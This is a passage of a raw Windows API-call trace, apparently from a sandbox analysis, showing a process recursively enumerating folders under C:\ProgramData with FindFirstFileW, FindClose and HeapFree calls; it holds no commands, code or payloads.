lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Java\\*", lpFindFileData=0x253ed10 | out: lpFindFileData=0x253ed10) returned 0xa32aa8 [0140.053] FindClose (in: hFindFile=0xa32aa8 | out: hFindFile=0xa32aa8) returned 1 [0140.053] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x3320080 | out: hHeap=0x20f0000) returned 1 [0140.053] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Maintenance\\*", lpFindFileData=0x253ed10 | out: lpFindFileData=0x253ed10) returned 0xa32aa8 [0140.053] FindClose (in: hFindFile=0xa32aa8 | out: hFindFile=0xa32aa8) returned 1 [0140.054] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x3320080 | out: hHeap=0x20f0000) returned 1 [0140.054] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Microsoft Office\\*", lpFindFileData=0x253ed10 | out: lpFindFileData=0x253ed10) returned 0xa32aa8 [0140.054] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Microsoft Office\\Microsoft Office 2010 Tools\\*", lpFindFileData=0x253ea8c | out: lpFindFileData=0x253ea8c) returned 0xa32ae8 [0140.054] FindClose (in: hFindFile=0xa32ae8 | out: hFindFile=0xa32ae8) returned 1 [0140.055] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x3330088 | out: hHeap=0x20f0000) returned 1 [0140.055] FindClose (in: hFindFile=0xa32aa8 | out: hFindFile=0xa32aa8) returned 1 [0140.055] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x3320080 | out: hHeap=0x20f0000) returned 1 [0140.055] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\SharePoint\\*", lpFindFileData=0x253ed10 | out: lpFindFileData=0x253ed10) returned 0xa32aa8 [0140.056] FindClose (in: hFindFile=0xa32aa8 | out: hFindFile=0xa32aa8) returned 1 [0140.057] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x3320080 | out: hHeap=0x20f0000) returned 1 [0140.057] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\*", lpFindFileData=0x253ed10 | out: lpFindFileData=0x253ed10) returned 0xa32aa8 [0140.057] FindClose (in: hFindFile=0xa32aa8 | out: hFindFile=0xa32aa8) returned 1 [0140.057] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x3320080 | out: hHeap=0x20f0000) returned 1 [0140.057] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Tablet PC\\*", lpFindFileData=0x253ed10 | out: lpFindFileData=0x253ed10) returned 0xa32aa8 [0140.057] FindClose (in: hFindFile=0xa32aa8 | out: hFindFile=0xa32aa8) returned 1 [0140.057] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x3320080 | out: hHeap=0x20f0000) returned 1 [0140.057] FindClose (in: hFindFile=0xa32a68 | out: hFindFile=0xa32a68) returned 1 [0140.057] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x3310078 | out: hHeap=0x20f0000) returned 1 [0140.057] FindClose (in: hFindFile=0xa32a28 | out: hFindFile=0xa32a28) returned 1 [0140.057] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x3300070 | out: hHeap=0x20f0000) returned 1 [0140.057] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Templates\\*", lpFindFileData=0x253f218 | out: lpFindFileData=0x253f218) returned 0xa32a28 [0140.058] FindClose (in: hFindFile=0xa32a28 | out: hFindFile=0xa32a28) returned 1 [0140.058] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x3300070 | out: hHeap=0x20f0000) returned 1 [0140.058] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\WER\\*", lpFindFileData=0x253f218 | out: lpFindFileData=0x253f218) returned 0xa32a28 [0140.058] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\WER\\ReportArchive\\*", lpFindFileData=0x253ef94 | out: lpFindFileData=0x253ef94) returned 0xa32a68 [0140.058] FindClose (in: hFindFile=0xa32a68 | out: hFindFile=0xa32a68) returned 1 [0140.058] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x3310078 | out: hHeap=0x20f0000) returned 1 [0140.058] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\WER\\ReportQueue\\*", lpFindFileData=0x253ef94 | out: lpFindFileData=0x253ef94) returned 0xa32a68 [0140.059] FindClose (in: hFindFile=0xa32a68 | out: hFindFile=0xa32a68) returned 1 [0140.059] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x3310078 | out: hHeap=0x20f0000) returned 1 [0140.059] FindClose (in: hFindFile=0xa32a28 | out: hFindFile=0xa32a28) returned 1 [0140.059] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x3300070 | out: hHeap=0x20f0000) returned 1 [0140.059] FindClose (in: hFindFile=0xa32968 | out: hFindFile=0xa32968) returned 1 [0140.059] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x2257a60 | out: hHeap=0x20f0000) returned 1 [0140.060] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\*", lpFindFileData=0x253f49c | out: lpFindFileData=0x253f49c) returned 0xa32968 [0140.062] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Definition Updates\\*", lpFindFileData=0x253f218 | out: lpFindFileData=0x253f218) returned 0xa32a28 [0140.062] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Definition Updates\\Backup\\*", lpFindFileData=0x253ef94 | out: lpFindFileData=0x253ef94) returned 0xa32a68 [0140.062] FindClose (in: hFindFile=0xa32a68 | out: hFindFile=0xa32a68) returned 1 [0140.062] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x3310078 | out: hHeap=0x20f0000) returned 1 [0140.062] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Definition Updates\\Updates\\*", lpFindFileData=0x253ef94 | out: lpFindFileData=0x253ef94) returned 0xa328a8 [0140.127] FindClose (in: hFindFile=0xa328a8 | out: hFindFile=0xa328a8) returned 1 [0140.127] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x3310078 | out: hHeap=0x20f0000) returned 1 [0140.128] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Definition Updates\\{D2B0B133-42ED-44D3-809A-46EBB62BA863}\\*", lpFindFileData=0x253ef94 | out: lpFindFileData=0x253ef94) returned 0xa328a8 [0140.128] FindClose (in: hFindFile=0xa328a8 | out: hFindFile=0xa328a8) returned 1 [0140.128] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x32c0050 | out: hHeap=0x20f0000) returned 1 [0140.129] FindClose (in: hFindFile=0xa32a28 | out: hFindFile=0xa32a28) returned 1 [0140.129] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x3300070 | out: hHeap=0x20f0000) returned 1 [0140.130] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\LocalCopy\\*", lpFindFileData=0x253f218 | out: lpFindFileData=0x253f218) returned 0xa32a28 [0140.130] FindClose (in: hFindFile=0xa32a28 | out: hFindFile=0xa32a28) returned 1 [0140.130] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x32c0050 | out: hHeap=0x20f0000) returned 1 [0140.131] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Quarantine\\*", lpFindFileData=0x253f218 | out: lpFindFileData=0x253f218) returned 0xa32a28 [0140.131] FindClose (in: hFindFile=0xa32a28 | out: hFindFile=0xa32a28) returned 1 [0140.132] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x32c0050 | out: hHeap=0x20f0000) returned 1 [0140.132] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\*", lpFindFileData=0x253f218 | out: lpFindFileData=0x253f218) returned 0xa32a28 [0140.132] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\*", lpFindFileData=0x253ef94 | out: lpFindFileData=0x253ef94) returned 0xa328a8 [0140.132] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\CacheManager\\*", lpFindFileData=0x253ed10 | out: lpFindFileData=0x253ed10) returned 0xa32a68 [0140.133] FindClose (in: hFindFile=0xa32a68 | out: hFindFile=0xa32a68) returned 1 [0140.133] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x3300070 | out: hHeap=0x20f0000) returned 1 [0140.133] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\Results\\*", lpFindFileData=0x253ed10 | out: lpFindFileData=0x253ed10) returned 0xa32a68 [0140.133] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\Results\\Resource\\*", lpFindFileData=0x253ea8c | out: lpFindFileData=0x253ea8c) returned 0xa32aa8 [0140.133] FindClose (in: hFindFile=0xa32aa8 | out: hFindFile=0xa32aa8) returned 1 [0140.133] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x3310078 | out: hHeap=0x20f0000) returned 1 [0140.133] FindClose (in: hFindFile=0xa32a68 | out: hFindFile=0xa32a68) returned 1 [0140.133] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x3300070 | out: hHeap=0x20f0000) returned 1 [0140.133] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\Service\\*", lpFindFileData=0x253ed10 | out: lpFindFileData=0x253ed10) returned 0xa32a68 [0140.133] FindClose (in: hFindFile=0xa32a68 | out: hFindFile=0xa32a68) returned 1 [0140.133] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x3300070 | out: hHeap=0x20f0000) returned 1 [0140.133] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\Store\\*", lpFindFileData=0x253ed10 | out: lpFindFileData=0x253ed10) returned 0xa32a68 [0140.133] FindClose (in: hFindFile=0xa32a68 | out: hFindFile=0xa32a68) returned 1 [0140.134] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x3300070 | out: hHeap=0x20f0000) returned 1 [0140.134] FindClose (in: hFindFile=0xa328a8 | out: hFindFile=0xa328a8) returned 1 [0140.134] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x32d0058 | out: hHeap=0x20f0000) returned 1 [0140.135] FindClose (in: hFindFile=0xa32a28 | out: hFindFile=0xa32a28) returned 1 [0140.135] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x32c0050 | out: hHeap=0x20f0000) returned 1 [0140.135] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Support\\*", lpFindFileData=0x253f218 | out: lpFindFileData=0x253f218) returned 0xa32a28 [0140.135] FindClose (in: hFindFile=0xa32a28 | out: hFindFile=0xa32a28) returned 1 [0140.135] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x32c0050 | out: hHeap=0x20f0000) returned 1 [0140.135] FindClose (in: hFindFile=0xa32968 | out: hFindFile=0xa32968) returned 1 [0140.136] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x2257a60 | out: hHeap=0x20f0000) returned 1 [0140.136] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\*", lpFindFileData=0x253f49c | out: lpFindFileData=0x253f49c) returned 0xa32968 [0140.137] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\*", lpFindFileData=0x253f218 | out: lpFindFileData=0x253f218) returned 0xa32a28 [0140.137] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\ActivityLog\\*", lpFindFileData=0x253ef94 | out: lpFindFileData=0x253ef94) returned 0xa328a8 [0140.137] FindClose (in: hFindFile=0xa328a8 | out: hFindFile=0xa328a8) returned 1 [0140.137] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x32d0058 | out: hHeap=0x20f0000) returned 1 [0140.137] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\Common Coverpages\\*", lpFindFileData=0x253ef94 | out: lpFindFileData=0x253ef94) returned 0xa328a8 [0140.138] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\Common Coverpages\\en-US\\*", lpFindFileData=0x253ed10 | out: lpFindFileData=0x253ed10) returned 0xa32a68 [0140.138] FindClose (in: hFindFile=0xa32a68 | out: hFindFile=0xa32a68) returned 1 [0140.138] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x3300070 | out: hHeap=0x20f0000) returned 1 [0140.139] FindClose (in: hFindFile=0xa328a8 | out: hFindFile=0xa328a8) returned 1 [0140.139] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x32d0058 | out: hHeap=0x20f0000) returned 1 [0140.140] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\Inbox\\*", lpFindFileData=0x253ef94 | out: lpFindFileData=0x253ef94) returned 0xa328a8 [0140.140] FindClose (in: hFindFile=0xa328a8 | out: hFindFile=0xa328a8) returned 1 [0140.140] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x32d0058 | out: hHeap=0x20f0000) returned 1 [0140.140] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\Queue\\*", lpFindFileData=0x253ef94 | out: lpFindFileData=0x253ef94) returned 0xa328a8 [0140.140] FindClose (in: hFindFile=0xa328a8 | out: hFindFile=0xa328a8) returned 1 [0140.141] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x32d0058 | out: hHeap=0x20f0000) returned 1 [0140.141] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\SentItems\\*", lpFindFileData=0x253ef94 | out: lpFindFileData=0x253ef94) returned 0xa328a8 [0140.141] FindClose (in: hFindFile=0xa328a8 | out: hFindFile=0xa328a8) returned 1 [0140.141] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x32d0058 | out: hHeap=0x20f0000) returned 1 [0140.141] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\VirtualInbox\\*", lpFindFileData=0x253ef94 | out: lpFindFileData=0x253ef94) returned 0xa328a8 [0140.142] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\VirtualInbox\\en-US\\*", lpFindFileData=0x253ed10 | out: lpFindFileData=0x253ed10) returned 0xa32a68 [0140.142] FindClose (in: hFindFile=0xa32a68 | out: hFindFile=0xa32a68) returned 1 [0140.142] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x3300070 | out: hHeap=0x20f0000) returned 1 [0140.142] FindClose (in: hFindFile=0xa328a8 | out: hFindFile=0xa328a8) returned 1 [0140.142] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x32d0058 | out: hHeap=0x20f0000) returned 1 [0140.144] FindClose (in: hFindFile=0xa32a28 | out: hFindFile=0xa32a28) returned 1 [0140.144] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x32c0050 | out: hHeap=0x20f0000) returned 1 [0140.144] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSScan\\*", lpFindFileData=0x253f218 | out: lpFindFileData=0x253f218) returned 0xa32a28 [0140.144] FindClose (in: hFindFile=0xa32a28 | out: hFindFile=0xa32a28) returned 1 [0140.144] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x32c0050 | out: hHeap=0x20f0000) returned 1 [0140.145] FindClose (in: hFindFile=0xa32968 | out: hFindFile=0xa32968) returned 1 [0140.145] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x2257a60 | out: hHeap=0x20f0000) returned 1 [0140.145] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\WwanSvc\\*", lpFindFileData=0x253f49c | out: lpFindFileData=0x253f49c) returned 0xa32968 [0140.146] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\WwanSvc\\Profiles\\*", lpFindFileData=0x253f218 | out: lpFindFileData=0x253f218) returned 0xa32a28 [0140.146] FindClose (in: hFindFile=0xa32a28 | out: hFindFile=0xa32a28) returned 1 [0140.146] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x32c0050 | out: hHeap=0x20f0000) returned 1 [0140.146] FindClose (in: hFindFile=0xa32968 | out: hFindFile=0xa32968) returned 1 [0140.146] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x2257a60 | out: hHeap=0x20f0000) returned 1 [0140.147] FindClose (in: hFindFile=0xa32928 | out: hFindFile=0xa32928) returned 1 [0140.147] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x2247a58 | out: hHeap=0x20f0000) returned 1 [0140.147] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\*", lpFindFileData=0x253f720 | out: lpFindFileData=0x253f720) returned 0xa32928 [0140.148] FindClose (in: hFindFile=0xa32928 | out: hFindFile=0xa32928) returned 1 [0140.149] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x2247a58 | out: hHeap=0x20f0000) returned 1 [0140.149] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Mozilla\\*", lpFindFileData=0x253f720 | out: lpFindFileData=0x253f720) returned 0xa32928 [0140.149] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Mozilla\\logs\\*", lpFindFileData=0x253f49c | out: lpFindFileData=0x253f49c) returned 0xa32968 [0140.149] FindClose (in: hFindFile=0xa32968 | out: hFindFile=0xa32968) returned 1 [0140.149] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x2257a60 | out: hHeap=0x20f0000) returned 1 [0140.149] FindClose (in: hFindFile=0xa32928 | out: hFindFile=0xa32928) returned 1 [0140.149] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x2247a58 | out: hHeap=0x20f0000) returned 1 [0140.150] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Oracle\\*", lpFindFileData=0x253f720 | out: lpFindFileData=0x253f720) returned 0xa32928 [0140.150] FindClose (in: hFindFile=0xa32928 | out: hFindFile=0xa32928) returned 1 [0140.150] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x2247a58 | out: hHeap=0x20f0000) returned 1 [0140.150] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\*", lpFindFileData=0x253f720 | out: lpFindFileData=0x253f720) returned 0xa32928 [0140.150] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\42D5BEC7DDFBD49E76467529CBC2868987BF8460\\*", lpFindFileData=0x253f49c | out: lpFindFileData=0x253f49c) returned 0xa32968 [0140.150] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\42D5BEC7DDFBD49E76467529CBC2868987BF8460\\packages\\*", lpFindFileData=0x253f218 | out: lpFindFileData=0x253f218) returned 0xa32a28 [0140.150] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\42D5BEC7DDFBD49E76467529CBC2868987BF8460\\packages\\Patch\\*", lpFindFileData=0x253ef94 | out: lpFindFileData=0x253ef94) returned 0xa328a8 [0140.151] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\42D5BEC7DDFBD49E76467529CBC2868987BF8460\\packages\\Patch\\x64\\*", lpFindFileData=0x253ed10 | out: lpFindFileData=0x253ed10) returned 0xa32a68 [0140.151] FindClose (in: hFindFile=0xa32a68 | out: hFindFile=0xa32a68) returned 1 [0140.151] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x3300070 | out: hHeap=0x20f0000) returned 1 [0140.151] FindClose (in: hFindFile=0xa328a8 | out: hFindFile=0xa328a8) returned 1 [0140.151] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x32d0058 | out: hHeap=0x20f0000) returned 1 [0140.152] FindClose (in: hFindFile=0xa32a28 | out: hFindFile=0xa32a28) returned 1 [0140.152] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x32c0050 | out: hHeap=0x20f0000) returned 1 [0140.153] FindClose (in: hFindFile=0xa32968 | out: hFindFile=0xa32968) returned 1 [0140.153] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x2257a60 | out: hHeap=0x20f0000) returned 1 [0140.153] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\54050A5F8AE7F0C56E553F0090146C17A1D2BF8D\\*", lpFindFileData=0x253f49c | out: lpFindFileData=0x253f49c) returned 0xa32968 [0140.154] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\54050A5F8AE7F0C56E553F0090146C17A1D2BF8D\\packages\\*", lpFindFileData=0x253f218 | out: lpFindFileData=0x253f218) returned 0xa32a28 [0140.154] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\54050A5F8AE7F0C56E553F0090146C17A1D2BF8D\\packages\\Patch\\*", lpFindFileData=0x253ef94 | out: lpFindFileData=0x253ef94) returned 0xa328a8 [0140.154] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\54050A5F8AE7F0C56E553F0090146C17A1D2BF8D\\packages\\Patch\\x64\\*", lpFindFileData=0x253ed10 | out: lpFindFileData=0x253ed10) returned 0xa32a68 [0140.155] FindClose (in: hFindFile=0xa32a68 | out: hFindFile=0xa32a68) returned 1 [0140.155] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x3300070 | out: hHeap=0x20f0000) returned 1 [0140.155] FindClose (in: hFindFile=0xa328a8 | out: hFindFile=0xa328a8) returned 1 [0140.155] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x32d0058 | out: hHeap=0x20f0000) returned 1 [0140.156] FindClose (in: hFindFile=0xa32a28 | out: hFindFile=0xa32a28) returned 1 [0140.156] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x32c0050 | out: hHeap=0x20f0000) returned 1 [0140.156] FindClose (in: hFindFile=0xa32968 | out: hFindFile=0xa32968) returned 1 [0140.156] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x2257a60 | out: hHeap=0x20f0000) returned 1 [0140.157] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\*", lpFindFileData=0x253f49c | out: lpFindFileData=0x253f49c) returned 0xa32968 [0140.157] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\*", lpFindFileData=0x253f218 | out: lpFindFileData=0x253f218) returned 0xa32a28 [0140.157] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\vcRuntimeMinimum_x86\\*", lpFindFileData=0x253ef94 | out: lpFindFileData=0x253ef94) returned 0xa328a8 [0140.157] FindClose (in: hFindFile=0xa328a8 | out: hFindFile=0xa328a8) returned 1 [0140.157] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x32d0058 | out: hHeap=0x20f0000) returned 1 [0140.158] FindClose (in: hFindFile=0xa32a28 | out: hFindFile=0xa32a28) returned 1 [0140.158] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x32c0050 | out: hHeap=0x20f0000) returned 1 [0140.158] FindClose (in: hFindFile=0xa32968 | out: hFindFile=0xa32968) returned 1 [0140.158] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x2257a60 | out: hHeap=0x20f0000) returned 1 [0140.159] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\*", lpFindFileData=0x253f49c | out: lpFindFileData=0x253f49c) returned 0xa32968 [0140.159] FindClose (in: hFindFile=0xa32968 | out: hFindFile=0xa32968) returned 1 [0140.159] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x2257a60 | out: hHeap=0x20f0000) returned 1 [0140.159] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\*", lpFindFileData=0x253f49c | out: lpFindFileData=0x253f49c) returned 0xa32968 [0140.159] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages\\*", lpFindFileData=0x253f218 | out: lpFindFileData=0x253f218) returned 0xa32a28 [0140.159] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages\\vcRuntimeAdditional_amd64\\*", lpFindFileData=0x253ef94 | out: lpFindFileData=0x253ef94) returned 0xa328a8 [0140.159] FindClose (in: hFindFile=0xa328a8 | out: hFindFile=0xa328a8) returned 1 [0140.159] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x32d0058 | out: hHeap=0x20f0000) returned 1 [0140.160] FindClose (in: hFindFile=0xa32a28 | out: hFindFile=0xa32a28) returned 1 [0140.160] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x32c0050 | out: hHeap=0x20f0000) returned 1 [0140.160] FindClose (in: hFindFile=0xa32968 | out: hFindFile=0xa32968) returned 1 [0140.160] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x2257a60 | out: hHeap=0x20f0000) returned 1 [0140.160] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}\\*", lpFindFileData=0x253f49c | out: lpFindFileData=0x253f49c) returned 0xa32968 [0140.161] FindClose (in: hFindFile=0xa32968 | out: hFindFile=0xa32968) returned 1 [0140.161] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x2257a60 | out: hHeap=0x20f0000) returned 1 [0140.161] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\\*", lpFindFileData=0x253f49c | out: lpFindFileData=0x253f49c) returned 0xa32968 [0140.161] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\\packages\\*", lpFindFileData=0x253f218 | out: lpFindFileData=0x253f218) returned 0xa32a28 [0140.161] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\\packages\\vcRuntimeMinimum_x86\\*", lpFindFileData=0x253ef94 | out: lpFindFileData=0x253ef94) returned 0xa328a8 [0140.161] FindClose (in: hFindFile=0xa328a8 | out: hFindFile=0xa328a8) returned 1 [0140.161] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x32d0058 | out: hHeap=0x20f0000) returned 1 [0140.161] FindClose (in: hFindFile=0xa32a28 | out: hFindFile=0xa32a28) returned 1 [0140.161] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x32c0050 | out: hHeap=0x20f0000) returned 1 [0140.161] FindClose (in: hFindFile=0xa32968 | out: hFindFile=0xa32968) returned 1 [0140.162] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x2257a60 | out: hHeap=0x20f0000) returned 1 [0140.162] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017\\*", lpFindFileData=0x253f49c | out: lpFindFileData=0x253f49c) returned 0xa32968 [0140.163] 